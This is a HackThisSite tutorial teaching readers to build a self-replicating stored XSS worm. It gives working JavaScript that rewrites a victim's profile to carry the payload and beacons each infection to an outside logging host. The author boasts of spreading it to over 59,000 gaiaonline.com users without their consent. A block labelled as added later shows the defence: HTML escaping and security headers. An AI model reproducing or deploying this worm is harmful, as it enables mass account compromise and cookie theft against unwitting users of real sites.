"Political freedom is a society's safety valve, allowing the passionately critical a nonviolent way to express their dissatisfaction with the status quo." --David Cole
This is going to be a basic, real world example of an XSS worm at work. I found the power of the XSS worm maybe 9 months ago when I started learning AJAX and I realized I could use it with JS injection. The results are phenomenal; I'll share my story after the tutorial!
**STEP 1**
Find a site where exploiting would work with a worm. XSS worms need a lot of people in order to spread properly.
Learn the basics of JavaScript, XSS, and AJAX. It will help you understand everything, as I didn't go into a whole lot of detail.
**STEP 2**
Find an insecure input on the site. Anyplace you see inputs, try inserting some JavaScript and see if it is vulnerable. XSS worms rely on JavaScript, so without it the worm won't work. A good test would be something like:
`<script>alert('XSS')</script>`
Obviously it can be much deeper than just that, but that's a good first step. Read some articles on JS injection for more about finding the hole.
**STEP 3**
Decide what you want your worm to do. You can have it steal cookies, or maybe overwrite pages to try finding anything you may desire. I personally just do it for shits and giggles and just have a cookie stealer (which usually yields a useless session ID; read about session hijacking too) and a counter on mine. The cookie stealer pretty much does nothing except log a timestamp for the user. Most sites use sessions to store data, not just cookies, but if they do use cookies you have a lot more control and access to information :).
Time to explain how they work. You use JavaScript (and PHP or another scripting language to log anything). You need to find a page vulnerable to XSS, and the page has to be visible to other people browsing the site. For the most part, anything found in user control panels, etc. won't work. What will work is something like a profile page (like MySpace) or a forum.
You then need some way (AJAX) to replicate a set of code. For example, let's say a user on MySpace is logged in, views your profile page, and is now infected with the worm. When they viewed your profile page, the AJAX script would have sent a request in the background to change the profile of the logged-in user to contain the same JavaScript code. Then this person's profile is infected with the worm, anyone that views that profile is infected, and it goes on in a continuous cycle. Also note that the benefit of using AJAX is not only the ability to hide all functions in the background, but that it lets you send POST requests, whereas a redirect sending GET variables is more noticeable and many forms may not accept it.
The biggest problem here is that the injected input will probably be seen if it's an input a user can change. You can use your creativity with JS/HTML to find places people will never suspect the JS code to be hidden. You can also include the JS from an external site, or have all the JS injected directly onto the page by the worm. I personally like using an external site because you can change what the JS does and/or stop the worm if you choose to do so, which you otherwise could not. After finding the hole, hiding the code from users/administrators is usually the hardest part.
**STEP 4**
Understanding the JavaScript code to use (read the code comments). This script would be hosted at http://themostbasic.nonhidden/formofincludingjs
CODE :
```javascript
function createCookie(name,value,days) {
    if (days) {
        var date = new Date();
        date.setTime(date.getTime()+(days*24*60*60*1000));
        var expires = "; expires="+date.toGMTString();
    }
    else var expires = "";
    document.cookie = name+"="+value+expires;
} // create a cookie

function readCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for(var i=0;i < ca.length;i++) {
        var c = ca[i];
        while (c.charAt(0)==' ') c = c.substring(1,c.length);
        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
    }
    return null;
} // read a cookie

/* you need a way so when a user already infected views the page they don't get
   the worm again. There are other ways of doing this, but I figure since you have
   access to JS on the site, why not create cookies on the site :-p. If you are
   worried about someone noticing a cookie that doesn't normally exist on their
   system, just change the method used */
var qcd = readCookie('fake');

if( qcd != "592570942") // if the cookie doesn't exist, insert the worm.
{
    var inject = "<script src='http://themostbasic.nonhidden/formofincludingjs'></script>";
    if (window.ActiveXObject){
        var http = new ActiveXObject("Microsoft.XMLHTTP");
    } // this will only work on IE users, search AJAX to learn how to make this code cross-browser compatible.
    http.open("GET", "http://www.site.com/vulnerablepage.php?injectionvariable="+inject, true);
    http.onreadystatechange = function() {
        if(http.readyState == 4 && http.status == 200) {
            tell = http.responseText;
        }
    }
    http.send(null);
    http.close;
    // this is optional, it will send the user to an external site to log information.
    // If you know how, do this without redirecting and in the background along with
    // the AJAX to make it 100% hidden.
    new Image().src='http://externalsite.com/logger.php?redirect=thispage';
    createCookie('fake','592570942','25');
}
```
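The defender's counterpart to the code above, added here and not part of the original article: server-side output encoding that stops the stored payload from ever running as markup, plus the response headers that blunt the worm's other steps (the external script include, the image-beacon logger, and script access to the session cookie). Plain Node.js with no dependencies; the function names are mine, and the sample payloads are the two injection strings quoted in the article.

```javascript
// Added defensive example (not from the original article). Shows the two
// controls that break the propagation cycle described in STEP 3: output
// encoding of user-controlled profile text, and response headers that deny
// inline/third-party script, off-site image beacons and script-readable cookies.

// Escape the five characters that let text break out of an HTML text node
// or a quoted attribute. Output encoding is the primary fix for stored XSS.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Render a profile page. `bio` is attacker-controlled (the article's
// "injectionvariable"); it must only ever land inside a text node.
function renderProfile(username, bio) {
  return `<h1>${escapeHtml(username)}</h1>\n<p class="bio">${escapeHtml(bio)}</p>`;
}

// Headers that would have stopped the worm even if one escaping call was
// missed: no inline or third-party scripts, no off-site image beacons, and a
// session cookie that document.cookie cannot read. Cookie value is a placeholder.
function securityHeaders() {
  return {
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; img-src 'self'; object-src 'none'",
    'Set-Cookie': 'sid=PLACEHOLDER; Path=/; HttpOnly; Secure; SameSite=Lax',
    'X-Content-Type-Options': 'nosniff',
  };
}

// Constructed samples: the article's probe and its replication payload.
const SAMPLE_PAYLOADS = [
  "<script>alert('XSS')</script>",
  "<script src='http://themostbasic.nonhidden/formofincludingjs'></script>",
];

// True when no sample payload survives rendering as a live <script> tag.
function allPayloadsNeutralised() {
  return SAMPLE_PAYLOADS.every((p) => !/<script/i.test(renderProfile('eve', p)));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const p of SAMPLE_PAYLOADS) console.log(renderProfile('eve', p));
  console.log(securityHeaders());
  console.log('all payloads neutralised:', allPayloadsNeutralised());
}
```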
**STEP 5**
Try in a controlled environment please. I take no responsibility for your actions; this was created to spread knowledge, don't destroy something good. Anyway, this is some really powerful code here. I created a worm on gaiaonline.com on their profiles and it really was amazing. Using code similar to the above, but not as plain, I created a worm that spread from my account to over 59,000 people in 3 days! The text file storing the timestamp and user number reached somewhere around 50MB or more (I really don't remember). It reached a point where the web host would not let me access the text file due to file size limits! Have fun!
Please leave feedback, this is my first article!
HackThisSite is the collective work of the HackThisSite staff, licensed under a CC BY-NC license.
We ask that you inform us upon sharing or distributing.